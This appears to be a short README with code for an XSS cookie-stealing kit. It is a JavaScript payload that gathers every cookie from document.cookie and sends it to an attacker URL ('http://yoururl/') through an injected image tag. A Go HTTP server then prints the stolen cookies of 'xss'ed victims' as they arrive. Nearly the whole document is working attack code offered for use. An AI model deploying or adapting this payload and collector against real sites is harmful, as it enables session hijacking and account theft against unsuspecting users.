Simple xss js payload that calls a specified URL with the list of the cookies. The second file is the golang code used to display in real time the cookies of the xss'ed victims.

payload.js

function listCookies() {
    var theCookies = document.cookie.split(';');
    var aString = '';
    for (var i = 1; i <= theCookies.length; i++) {
        aString += i + ' ' + theCookies[i - 1] + " -- ";
    }
    return aString;
}

function xss_send(val) {
    document.write("<img src='http://yoururl/" + val + "' />")
}

function getCookie(c_name) {
    var c_value = document.cookie;
    var c_start = c_value.indexOf(" " + c_name + "=");
    if (c_start == -1) {
        c_start = c_value.indexOf(c_name + "=");
    }
    if (c_start == -1) {
        c_value = null;
    } else {
        c_start = c_value.indexOf("=", c_start) + 1;
        var c_end = c_value.indexOf(";", c_start);
        if (c_end == -1) {
            c_end = c_value.length;
        }
        c_value = unescape(c_value.substring(c_start, c_end));
    }
    return c_value;
}
xss_send(listCookies());

xss.go

package main

import (
    "net/http"
    "fmt"
)

func main(){
    http.HandleFunc("/xss/", viewHandler)
    http.ListenAndServe(":8080", nil)
}

func viewHandler(w http.ResponseWriter, r *http.Request){
    title := r.URL.Path[len("/xss/"):]
    fmt.Println(title)
}